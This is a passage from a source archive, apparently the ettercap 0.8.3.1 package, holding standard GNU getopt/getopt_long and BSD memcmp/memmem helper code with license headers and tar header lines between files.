useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Library General Public License for more details. You should have received a copy of the GNU Library General Public License along with this library; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA */ /* This tells Alpha OSF/1 not to define a getopt prototype in . Ditto for AIX 3.2 and . */ #ifndef _NO_PROTO # define _NO_PROTO #endif #ifdef HAVE_CONFIG_H # include #endif #if !defined __STDC__ || !__STDC__ /* This is a separate conditional since some stdc systems reject `defined (const)'. */ # ifndef const # define const # endif #endif #include /* Comment out all this code if we are using the GNU C Library, and are not actually compiling the library itself. This code is part of the GNU C Library, but also included in many other GNU distributions. Compiling and linking in this code is a waste when using the GNU C library (especially if it is a shared library). Rather than having every GNU program understand `configure --with-gnu-libc' and omit the object files, it is simpler to just do this in the source for each such file. */ #define GETOPT_INTERFACE_VERSION 2 #if !defined _LIBC && defined __GLIBC__ && __GLIBC__ >= 2 # include # if _GNU_GETOPT_INTERFACE_VERSION == GETOPT_INTERFACE_VERSION # define ELIDE_CODE # endif #endif #ifndef ELIDE_CODE /* This needs to come after some library #include to get __GNU_LIBRARY__ defined. */ #ifdef __GNU_LIBRARY__ /* Don't include stdlib.h for non-GNU C libraries because some of them contain conflicting prototypes for getopt. */ # include # include #endif /* GNU C library. */ #ifdef VMS # include # if HAVE_STRING_H - 0 # include # endif #endif #ifndef _ /* This is for other GNU distributions with internationalized messages. */ # if defined HAVE_LIBINTL_H || defined _LIBC # include # ifndef _ # define _(msgid) gettext (msgid) # endif # else # define _(msgid) (msgid) # endif #endif /* This version of `getopt' appears to the caller like standard Unix `getopt' but it behaves differently for the user, since it allows the user to intersperse the options with the other arguments. As `getopt' works, it permutes the elements of ARGV so that, when it is done, all the options precede everything else. Thus all application programs are extended to handle flexible argument order. Setting the environment variable POSIXLY_CORRECT disables permutation. Then the behavior is completely standard. GNU application programs can use a third alternative mode in which they can distinguish the relative order of options and other arguments. */ #include /* For communication from `getopt' to the caller. When `getopt' finds an option that takes an argument, the argument value is returned here. Also, when `ordering' is RETURN_IN_ORDER, each non-option ARGV-element is returned here. */ char *optarg; /* Index in ARGV of the next element to be scanned. This is used for communication to and from the caller and for communication between successive calls to `getopt'. On entry to `getopt', zero means this is the first call; initialize. When `getopt' returns -1, this is the index of the first of the non-option elements that the caller should itself scan. Otherwise, `optind' communicates from one call to the next how much of ARGV has been scanned so far. */ /* 1003.2 says this must be 1 before any call. */ int optind = 1; /* Formerly, initialization of getopt depended on optind==0, which causes problems with re-calling getopt as programs generally don't know that. */ int __getopt_initialized; /* The next char to be scanned in the option-element in which the last option character we returned was found. This allows us to pick up the scan where we left off. If this is zero, or a null string, it means resume the scan by advancing to the next ARGV-element. */ static char *nextchar; /* Callers store zero here to inhibit the error message for unrecognized options. */ int opterr = 1; /* Set to an option character which was unrecognized. This must be initialized on some systems to avoid linking in the system's own getopt implementation. */ int optopt = '?'; /* Describe how to deal with options that follow non-option ARGV-elements. If the caller did not specify anything, the default is REQUIRE_ORDER if the environment variable POSIXLY_CORRECT is defined, PERMUTE otherwise. REQUIRE_ORDER means don't recognize them as options; stop option processing when the first non-option is seen. This is what Unix does. This mode of operation is selected by either setting the environment variable POSIXLY_CORRECT, or using `+' as the first character of the list of option characters. PERMUTE is the default. We permute the contents of ARGV as we scan, so that eventually all the non-options are at the end. This allows options to be given in any order, even with programs that were not written to expect this. RETURN_IN_ORDER is an option available to programs that were written to expect options and other ARGV-elements in any order and that care about the ordering of the two. We describe each non-option ARGV-element as if it were the argument of an option with character code 1. Using `-' as the first character of the list of option characters selects this mode of operation. The special argument `--' forces an end of option-scanning regardless of the value of `ordering'. In the case of RETURN_IN_ORDER, only `--' can cause `getopt' to return -1 with `optind' != ARGC. */ static enum { REQUIRE_ORDER, PERMUTE, RETURN_IN_ORDER } ordering; /* Value of POSIXLY_CORRECT environment variable. */ static char *posixly_correct; #ifdef __GNU_LIBRARY__ /* We want to avoid inclusion of string.h with non-GNU libraries because there are many ways it can cause trouble. On some systems, it contains special magic macros that don't work in GCC. */ # include # define my_index strchr #else # if HAVE_STRING_H # include # else # include # endif /* Avoid depending on library functions or files whose names are inconsistent. */ #ifndef getenv extern char *getenv (); #endif static char * my_index (str, chr) const char *str; int chr; { while (*str) { if (*str == chr) return (char *) str; str++; } return 0; } /* If using GCC, we can safely declare strlen this way. If not using GCC, it is ok not to declare it. */ #ifdef __GNUC__ /* Note that Motorola Delta 68k R3V7 comes with GCC but not stddef.h. That was relevant to code that was here before. */ # if (!defined __STDC__ || !__STDC__) && !defined strlen /* gcc with -traditional declares the built-in strlen to return int, and has done so at least since version 2.4.5. -- rms. */ extern int strlen (const char *); # endif /* not __STDC__ */ #endif /* __GNUC__ */ #endif /* not __GNU_LIBRARY__ */ /* Handle permutation of arguments. */ /* Describe the part of ARGV that contains non-options that have been skipped. `first_nonopt' is the index in ARGV of the first of them; `last_nonopt' is the index after the last of them. */ static int first_nonopt; static int last_nonopt; #ifdef _LIBC /* Bash 2.0 gives us an environment variable containing flags indicating ARGV elements that should not be considered arguments. */ /* Defined in getopt_init.c */ extern char *__getopt_nonoption_flags; static int nonoption_flags_max_len; static int nonoption_flags_len; static int original_argc; static char *const *original_argv; /* Make sure the environment variable bash 2.0 puts in the environment is valid for the getopt call we must make sure that the ARGV passed to getopt is that one passed to the process. */ static void __attribute__ ((unused)) store_args_and_env (int argc, char *const *argv) { /* XXX This is no good solution. We should rather copy the args so that we can compare them later. But we must not use malloc(3). */ original_argc = argc; original_argv = argv; } # ifdef text_set_element text_set_element (__libc_subinit, store_args_and_env); # endif /* text_set_element */ # define SWAP_FLAGS(ch1, ch2) \ if (nonoption_flags_len > 0) \ { \ char __tmp = __getopt_nonoption_flags[ch1]; \ __getopt_nonoption_flags[ch1] = __getopt_nonoption_flags[ch2]; \ __getopt_nonoption_flags[ch2] = __tmp; \ } #else /* !_LIBC */ # define SWAP_FLAGS(ch1, ch2) #endif /* _LIBC */ /* Exchange two adjacent subsequences of ARGV. One subsequence is elements [first_nonopt,last_nonopt) which contains all the non-options that have been skipped so far. The other is elements [last_nonopt,optind), which contains all the options processed since those non-options were skipped. `first_nonopt' and `last_nonopt' are relocated so that they describe the new indices of the non-options in ARGV after they are moved. */ #if defined __STDC__ && __STDC__ static void exchange (char **); #endif static void exchange (argv) char **argv; { int bottom = first_nonopt; int middle = last_nonopt; int top = optind; char *tem; /* Exchange the shorter segment with the far end of the longer segment. That puts the shorter segment into the right place. It leaves the longer segment in the right place overall, but it consists of two parts that need to be swapped next. */ #ifdef _LIBC /* First make sure the handling of the `__getopt_nonoption_flags' string can work normally. Our top argument must be in the range of the string. */ if (nonoption_flags_len > 0 && top >= nonoption_flags_max_len) { /* We must extend the array. The user plays games with us and presents new arguments. */ char *new_str = malloc (top + 1); if (new_str == NULL) nonoption_flags_len = nonoption_flags_max_len = 0; else { memset (__mempcpy (new_str, __getopt_nonoption_flags, nonoption_flags_max_len), '\0', top + 1 - nonoption_flags_max_len); nonoption_flags_max_len = top + 1; __getopt_nonoption_flags = new_str; } } #endif while (top > middle && middle > bottom) { if (top - middle > middle - bottom) { /* Bottom segment is the short one. */ int len = middle - bottom; register int i; /* Swap it with the top part of the top segment. */ for (i = 0; i < len; i++) { tem = argv[bottom + i]; argv[bottom + i] = argv[top - (middle - bottom) + i]; argv[top - (middle - bottom) + i] = tem; SWAP_FLAGS (bottom + i, top - (middle - bottom) + i); } /* Exclude the moved bottom segment from further swapping. */ top -= len; } else { /* Top segment is the short one. */ int len = top - middle; register int i; /* Swap it with the bottom part of the bottom segment. */ for (i = 0; i < len; i++) { tem = argv[bottom + i]; argv[bottom + i] = argv[middle + i]; argv[middle + i] = tem; SWAP_FLAGS (bottom + i, middle + i); } /* Exclude the moved top segment from further swapping. */ bottom += len; } } /* Update records for the slots the non-options now occupy. */ first_nonopt += (optind - last_nonopt); last_nonopt = optind; } /* Initialize the internal data when the first call is made. */ #if defined __STDC__ && __STDC__ static const char *_getopt_initialize (int, char *const *, const char *); #endif static const char * _getopt_initialize (argc, argv, optstring) int argc; char *const *argv; const char *optstring; { /* Start processing options with ARGV-element 1 (since ARGV-element 0 is the program name); the sequence of previously skipped non-option ARGV-elements is empty. */ first_nonopt = last_nonopt = optind; nextchar = NULL; posixly_correct = getenv ("POSIXLY_CORRECT"); /* Determine how to handle the ordering of options and nonoptions. */ if (optstring[0] == '-') { ordering = RETURN_IN_ORDER; ++optstring; } else if (optstring[0] == '+') { ordering = REQUIRE_ORDER; ++optstring; } else if (posixly_correct != NULL) ordering = REQUIRE_ORDER; else ordering = PERMUTE; #ifdef _LIBC if (posixly_correct == NULL && argc == original_argc && argv == original_argv) { if (nonoption_flags_max_len == 0) { if (__getopt_nonoption_flags == NULL || __getopt_nonoption_flags[0] == '\0') nonoption_flags_max_len = -1; else { const char *orig_str = __getopt_nonoption_flags; int len = nonoption_flags_max_len = strlen (orig_str); if (nonoption_flags_max_len < argc) nonoption_flags_max_len = argc; __getopt_nonoption_flags = (char *) malloc (nonoption_flags_max_len); if (__getopt_nonoption_flags == NULL) nonoption_flags_max_len = -1; else memset (__mempcpy (__getopt_nonoption_flags, orig_str, len), '\0', nonoption_flags_max_len - len); } } nonoption_flags_len = nonoption_flags_max_len; } else nonoption_flags_len = 0; #else (void) argc; (void) argv; #endif return optstring; } /* Scan elements of ARGV (whose length is ARGC) for option characters given in OPTSTRING. If an element of ARGV starts with '-', and is not exactly "-" or "--", then it is an option element. The characters of this element (aside from the initial '-') are option characters. If `getopt' is called repeatedly, it returns successively each of the option characters from each of the option elements. If `getopt' finds another option character, it returns that character, updating `optind' and `nextchar' so that the next call to `getopt' can resume the scan with the following option character or ARGV-element. If there are no more option characters, `getopt' returns -1. Then `optind' is the index in ARGV of the first ARGV-element that is not an option. (The ARGV-elements have been permuted so that those that are not options now come last.) OPTSTRING is a string containing the legitimate option characters. If an option character is seen that is not listed in OPTSTRING, return '?' after printing an error message. If you set `opterr' to zero, the error message is suppressed but we still return '?'. If a char in OPTSTRING is followed by a colon, that means it wants an arg, so the following text in the same ARGV-element, or the text of the following ARGV-element, is returned in `optarg'. Two colons mean an option that wants an optional arg; if there is text in the current ARGV-element, it is returned in `optarg', otherwise `optarg' is set to zero. If OPTSTRING starts with `-' or `+', it requests different methods of handling the non-option ARGV-elements. See the comments about RETURN_IN_ORDER and REQUIRE_ORDER, above. Long-named options begin with `--' instead of `-'. Their names may be abbreviated as long as the abbreviation is unique or is an exact match for some defined option. If they have an argument, it follows the option name in the same ARGV-element, separated from the option name by a `=', or else the in next ARGV-element. When `getopt' finds a long-named option, it returns 0 if that option's `flag' field is nonzero, the value of the option's `val' field if the `flag' field is zero. The elements of ARGV aren't really const, because we permute them. But we pretend they're const in the prototype to be compatible with other systems. LONGOPTS is a vector of `struct option' terminated by an element containing a name which is zero. LONGIND returns the index in LONGOPT of the long-named option found. It is only valid when a long-named option has been found by the most recent call. If LONG_ONLY is nonzero, '-' as well as '--' can introduce long-named options. */ int _getopt_internal (argc, argv, optstring, longopts, longind, long_only) int argc; char *const *argv; const char *optstring; const struct option *longopts; int *longind; int long_only; { int print_errors = opterr; if (optstring[0] == ':') print_errors = 0; if (argc < 1) return -1; optarg = NULL; if (optind == 0 || !__getopt_initialized) { if (optind == 0) optind = 1; /* Don't scan ARGV[0], the program name. */ optstring = _getopt_initialize (argc, argv, optstring); __getopt_initialized = 1; } /* Test whether ARGV[optind] points to a non-option argument. Either it does not have option syntax, or there is an environment flag from the shell indicating it is not an option. The later information is only used when the used in the GNU libc. */ #ifdef _LIBC # define NONOPTION_P (argv[optind][0] != '-' || argv[optind][1] == '\0' \ || (optind < nonoption_flags_len \ && __getopt_nonoption_flags[optind] == '1')) #else # define NONOPTION_P (argv[optind][0] != '-' || argv[optind][1] == '\0') #endif if (nextchar == NULL || *nextchar == '\0') { /* Advance to the next ARGV-element. */ /* Give FIRST_NONOPT & LAST_NONOPT rational values if OPTIND has been moved back by the user (who may also have changed the arguments). */ if (last_nonopt > optind) last_nonopt = optind; if (first_nonopt > optind) first_nonopt = optind; if (ordering == PERMUTE) { /* If we have just processed some options following some non-options, exchange them so that the options come first. */ if (first_nonopt != last_nonopt && last_nonopt != optind) exchange ((char **) argv); else if (last_nonopt != optind) first_nonopt = optind; /* Skip any additional non-options and extend the range of non-options previously skipped. */ while (optind < argc && NONOPTION_P) optind++; last_nonopt = optind; } /* The special ARGV-element `--' means premature end of options. Skip it like a null option, then exchange with previous non-options as if it were an option, then skip everything else like a non-option. */ if (optind != argc && !strcmp (argv[optind], "--")) { optind++; if (first_nonopt != last_nonopt && last_nonopt != optind) exchange ((char **) argv); else if (first_nonopt == last_nonopt) first_nonopt = optind; last_nonopt = argc; optind = argc; } /* If we have done all the ARGV-elements, stop the scan and back over any non-options that we skipped and permuted. */ if (optind == argc) { /* Set the next-arg-index to point at the non-options that we previously skipped, so the caller will digest them. */ if (first_nonopt != last_nonopt) optind = first_nonopt; return -1; } /* If we have come to a non-option and did not permute it, either stop the scan or describe it to the caller and pass it by. */ if (NONOPTION_P) { if (ordering == REQUIRE_ORDER) return -1; optarg = argv[optind++]; return 1; } /* We have found another option-ARGV-element. Skip the initial punctuation. */ nextchar = (argv[optind] + 1 + (longopts != NULL && argv[optind][1] == '-')); } /* Decode the current option-ARGV-element. */ /* Check whether the ARGV-element is a long option. If long_only and the ARGV-element has the form "-f", where f is a valid short option, don't consider it an abbreviated form of a long option that starts with f. Otherwise there would be no way to give the -f short option. On the other hand, if there's a long option "fubar" and the ARGV-element is "-fu", do consider that an abbreviation of the long option, just like "--fu", and not "-f" with arg "u". This distinction seems to be the most useful approach. */ if (longopts != NULL && (argv[optind][1] == '-' || (long_only && (argv[optind][2] || !my_index (optstring, argv[optind][1]))))) { char *nameend; const struct option *p; const struct option *pfound = NULL; int exact = 0; int ambig = 0; int indfound = -1; int option_index; for (nameend = nextchar; *nameend && *nameend != '='; nameend++) /* Do nothing. */ ; /* Test all long options for either exact match or abbreviated matches. */ for (p = longopts, option_index = 0; p->name; p++, option_index++) if (!strncmp (p->name, nextchar, nameend - nextchar)) { if ((unsigned int) (nameend - nextchar) == (unsigned int) strlen (p->name)) { /* Exact match found. */ pfound = p; indfound = option_index; exact = 1; break; } else if (pfound == NULL) { /* First nonexact match found. */ pfound = p; indfound = option_index; } else if (long_only || pfound->has_arg != p->has_arg || pfound->flag != p->flag || pfound->val != p->val) /* Second or later nonexact match found. */ ambig = 1; } if (ambig && !exact) { if (print_errors) fprintf (stderr, _("%s: option `%s' is ambiguous\n"), argv[0], argv[optind]); nextchar += strlen (nextchar); optind++; optopt = 0; return '?'; } if (pfound != NULL) { option_index = indfound; optind++; if (*nameend) { /* Don't test has_arg with >, because some C compilers don't allow it to be used on enums. */ if (pfound->has_arg) optarg = nameend + 1; else { if (print_errors) { if (argv[optind - 1][1] == '-') /* --option */ fprintf (stderr, _("%s: option `--%s' doesn't allow an argument\n"), argv[0], pfound->name); else /* +option or -option */ fprintf (stderr, _("%s: option `%c%s' doesn't allow an argument\n"), argv[0], argv[optind - 1][0], pfound->name); } nextchar += strlen (nextchar); optopt = pfound->val; return '?'; } } else if (pfound->has_arg == 1) { if (optind < argc) optarg = argv[optind++]; else { if (print_errors) fprintf (stderr, _("%s: option `%s' requires an argument\n"), argv[0], argv[optind - 1]); nextchar += strlen (nextchar); optopt = pfound->val; return optstring[0] == ':' ? ':' : '?'; } } nextchar += strlen (nextchar); if (longind != NULL) *longind = option_index; if (pfound->flag) { *(pfound->flag) = pfound->val; return 0; } return pfound->val; } /* Can't find it as a long option. If this is not getopt_long_only, or the option starts with '--' or is not a valid short option, then it's an error. Otherwise interpret it as a short option. */ if (!long_only || argv[optind][1] == '-' || my_index (optstring, *nextchar) == NULL) { if (print_errors) { if (argv[optind][1] == '-') /* --option */ fprintf (stderr, _("%s: unrecognized option `--%s'\n"), argv[0], nextchar); else /* +option or -option */ fprintf (stderr, _("%s: unrecognized option `%c%s'\n"), argv[0], argv[optind][0], nextchar); } nextchar = (char *) ""; optind++; optopt = 0; return '?'; } } /* Look at and handle the next short option-character. */ { char c = *nextchar++; char *temp = my_index (optstring, c); /* Increment `optind' when we start to process its last character. */ if (*nextchar == '\0') ++optind; if (temp == NULL || c == ':') { if (print_errors) { if (posixly_correct) /* 1003.2 specifies the format of this message. */ fprintf (stderr, _("%s: illegal option -- %c\n"), argv[0], c); else fprintf (stderr, _("%s: invalid option -- %c\n"), argv[0], c); } optopt = c; return '?'; } /* Convenience. Treat POSIX -W foo same as long option --foo */ if (temp[0] == 'W' && temp[1] == ';') { char *nameend; const struct option *p; const struct option *pfound = NULL; int exact = 0; int ambig = 0; int indfound = 0; int option_index; /* This is an option that requires an argument. */ if (*nextchar != '\0') { optarg = nextchar; /* If we end this ARGV-element by taking the rest as an arg, we must advance to the next element now. */ optind++; } else if (optind == argc) { if (print_errors) { /* 1003.2 specifies the format of this message. */ fprintf (stderr, _("%s: option requires an argument -- %c\n"), argv[0], c); } optopt = c; if (optstring[0] == ':') c = ':'; else c = '?'; return c; } else /* We already incremented `optind' once; increment it again when taking next ARGV-elt as argument. */ optarg = argv[optind++]; /* optarg is now the argument, see if it's in the table of longopts. */ for (nextchar = nameend = optarg; *nameend && *nameend != '='; nameend++) /* Do nothing. */ ; /* Test all long options for either exact match or abbreviated matches. */ for (p = longopts, option_index = 0; p->name; p++, option_index++) if (!strncmp (p->name, nextchar, nameend - nextchar)) { if ((unsigned int) (nameend - nextchar) == strlen (p->name)) { /* Exact match found. */ pfound = p; indfound = option_index; exact = 1; break; } else if (pfound == NULL) { /* First nonexact match found. */ pfound = p; indfound = option_index; } else /* Second or later nonexact match found. */ ambig = 1; } if (ambig && !exact) { if (print_errors) fprintf (stderr, _("%s: option `-W %s' is ambiguous\n"), argv[0], argv[optind]); nextchar += strlen (nextchar); optind++; return '?'; } if (pfound != NULL) { option_index = indfound; if (*nameend) { /* Don't test has_arg with >, because some C compilers don't allow it to be used on enums. */ if (pfound->has_arg) optarg = nameend + 1; else { if (print_errors) fprintf (stderr, _("\ %s: option `-W %s' doesn't allow an argument\n"), argv[0], pfound->name); nextchar += strlen (nextchar); return '?'; } } else if (pfound->has_arg == 1) { if (optind < argc) optarg = argv[optind++]; else { if (print_errors) fprintf (stderr, _("%s: option `%s' requires an argument\n"), argv[0], argv[optind - 1]); nextchar += strlen (nextchar); return optstring[0] == ':' ? ':' : '?'; } } nextchar += strlen (nextchar); if (longind != NULL) *longind = option_index; if (pfound->flag) { *(pfound->flag) = pfound->val; return 0; } return pfound->val; } nextchar = NULL; return 'W'; /* Let the application handle it. */ } if (temp[1] == ':') { if (temp[2] == ':') { /* This is an option that accepts an argument optionally. */ if (*nextchar != '\0') { optarg = nextchar; optind++; } else optarg = NULL; nextchar = NULL; } else { /* This is an option that requires an argument. */ if (*nextchar != '\0') { optarg = nextchar; /* If we end this ARGV-element by taking the rest as an arg, we must advance to the next element now. */ optind++; } else if (optind == argc) { if (print_errors) { /* 1003.2 specifies the format of this message. */ fprintf (stderr, _("%s: option requires an argument -- %c\n"), argv[0], c); } optopt = c; if (optstring[0] == ':') c = ':'; else c = '?'; } else /* We already incremented `optind' once; increment it again when taking next ARGV-elt as argument. */ optarg = argv[optind++]; nextchar = NULL; } } return c; } } int getopt (int, char *const *, const char *); int getopt (argc, argv, optstring) int argc; char *const *argv; const char *optstring; { return _getopt_internal (argc, argv, optstring, (const struct option *) 0, (int *) 0, 0); } #endif /* Not ELIDE_CODE. */ #ifdef TEST /* Compile with -DTEST to make an executable for use in testing the above definition of `getopt'. */ int main (argc, argv) int argc; char **argv; { int c; int digit_optind = 0; while (1) { int this_option_optind = optind ? optind : 1; c = getopt (argc, argv, "abc:d:0123456789"); if (c == -1) break; switch (c) { case '0': case '1': case '2': case '3': case '4': case '5': case '6': case '7': case '8': case '9': if (digit_optind != 0 && digit_optind != this_option_optind) printf ("digits occur in two different argv-elements.\n"); digit_optind = this_option_optind; printf ("option %c\n", c); break; case 'a': printf ("option a\n"); break; case 'b': printf ("option b\n"); break; case 'c': printf ("option c with value `%s'\n", optarg); break; case '?': break; default: printf ("?? getopt returned character code 0%o ??\n", c); } } if (optind < argc) { printf ("non-option ARGV-elements: "); while (optind < argc) printf ("%s ", argv[optind++]); printf ("\n"); } exit (0); } #endif /* TEST */ /* getopt_long and getopt_long_only entry points for GNU getopt. Copyright (C) 1987,88,89,90,91,92,93,94,96,97,98 Free Software Foundation, Inc. This file is part of the GNU C Library. The GNU C Library is free software; you can redistribute it and/or modify it under the terms of the GNU Library General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. The GNU C Library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Library General Public License for more details. You should have received a copy of the GNU Library General Public License along with the GNU C Library; see the file COPYING.LIB. If not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #ifdef HAVE_CONFIG_H #include #endif #include #if !defined __STDC__ || !__STDC__ /* This is a separate conditional since some stdc systems reject `defined (const)'. */ #ifndef const #define const #endif #endif #include /* Comment out all this code if we are using the GNU C Library, and are not actually compiling the library itself. This code is part of the GNU C Library, but also included in many other GNU distributions. Compiling and linking in this code is a waste when using the GNU C library (especially if it is a shared library). Rather than having every GNU program understand `configure --with-gnu-libc' and omit the object files, it is simpler to just do this in the source for each such file. */ #define GETOPT_INTERFACE_VERSION 2 #if !defined _LIBC && defined __GLIBC__ && __GLIBC__ >= 2 #include #if _GNU_GETOPT_INTERFACE_VERSION == GETOPT_INTERFACE_VERSION #define ELIDE_CODE #endif #endif #ifndef ELIDE_CODE /* This needs to come after some library #include to get __GNU_LIBRARY__ defined. */ #ifdef __GNU_LIBRARY__ #include #endif #ifndef NULL #define NULL 0 #endif int getopt_long (argc, argv, options, long_options, opt_index) int argc; char *const *argv; const char *options; const struct option *long_options; int *opt_index; { return _getopt_internal (argc, argv, options, long_options, opt_index, 0); } /* Like getopt_long, but '-' as well as '--' can indicate a long option. If an option that starts with '-' (not '--') doesn't match a long option, but does match a short option, it is parsed as a short option instead. */ int getopt_long_only (argc, argv, options, long_options, opt_index) int argc; char *const *argv; const char *options; const struct option *long_options; int *opt_index; { return _getopt_internal (argc, argv, options, long_options, opt_index, 1); } #endif /* Not ELIDE_CODE. */ #ifdef TEST #include int main (argc, argv) int argc; char **argv; { int c; int digit_optind = 0; while (1) { int this_option_optind = optind ? optind : 1; int option_index = 0; static struct option long_options[] = { {"add", 1, 0, 0}, {"append", 0, 0, 0}, {"delete", 1, 0, 0}, {"verbose", 0, 0, 0}, {"create", 0, 0, 0}, {"file", 1, 0, 0}, {0, 0, 0, 0} }; c = getopt_long (argc, argv, "abc:d:0123456789", long_options, &option_index); if (c == -1) break; switch (c) { case 0: printf ("option %s", long_options[option_index].name); if (optarg) printf (" with arg %s", optarg); printf ("\n"); break; case '0': case '1': case '2': case '3': case '4': case '5': case '6': case '7': case '8': case '9': if (digit_optind != 0 && digit_optind != this_option_optind) printf ("digits occur in two different argv-elements.\n"); digit_optind = this_option_optind; printf ("option %c\n", c); break; case 'a': printf ("option a\n"); break; case 'b': printf ("option b\n"); break; case 'c': printf ("option c with value `%s'\n", optarg); break; case 'd': printf ("option d with value `%s'\n", optarg); break; case '?': break; default: printf ("?? getopt returned character code 0%o ??\n", c); } } if (optind < argc) { printf ("non-option ARGV-elements: "); while (optind < argc) printf ("%s ", argv[optind++]); printf ("\n"); } exit (0); } #endif /* TEST */ ettercap-0.8.3.1/src/missing/memcmp.c000664 000000 000000 00000004452 13711276346 017351 0ustar00rootroot000000 000000 /*- * Copyright (c) 1990 The Regents of the University of California. * All rights reserved. * * This code is derived from software contributed to Berkeley by * Chris Torek. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #if defined(LIBC_SCCS) && !defined(lint) static char *rcsid = "$OpenBSD: memcmp.c,v 1.2 1996/08/19 08:34:05 tholo Exp $"; #endif /* LIBC_SCCS and not lint */ #include /* * Compare memory regions. */ int memcmp(s1, s2, n) const void *s1, *s2; size_t n; { if (n != 0) { register const unsigned char *p1 = s1, *p2 = s2; do { if (*p1++ != *p2++) return (*--p1 - *--p2); } while (--n != 0); } return (0); } ettercap-0.8.3.1/src/missing/memmem.c000664 000000 000000 00000005326 13711276346 017351 0ustar00rootroot000000 000000 /* * Copyright (c) 2001 Alberto Ornaghi * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. The name of the author may not be used to endorse or promote products * derived from this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL * THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #include #if 0 #include #include #include #endif void * memmem(const void *haystack, size_t haystacklen, const void *needle, size_t needlelen); /* * DESCRIPTION * The memmem() function finds the start of the first occurrence * of the substring needle of length needlelen in the memory area * haystack of length haystacklen. * * RETURN VALUE * The memmem() function returns a pointer to the beginning of the * substring, or NULL if the substring is not found. */ void * memmem(const void *haystack, size_t haystacklen, const void *needle, size_t needlelen) { register const char *h = haystack; register const char *n = needle; register size_t hl = haystacklen; register size_t nl = needlelen; register size_t i; if (nl == 0) return (void *) haystack; /* The first occurrence of the empty string is deemed to occur at the beginning of the string. */ for( i = 0; (i < hl) && (i + nl <= hl ); i++ ) if (h[i] == *n) /* first match */ if ( !memcmp(&h[i]+1, n + 1, nl - 1) ) return (void *)(haystack+i); /* returns a pointer to the substring */ return (void *)NULL; /* not found */ } /* EOF */ ettercap-0.8.3.1/src/missing/memrchr.c000664 000000 000000 00000004210 13711276346 017520 0ustar00rootroot000000 000000 /* * Copyright (c) 2001 Alberto Ornaghi * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. The name of the author may not be used to endorse or promote products * derived from this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL * THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 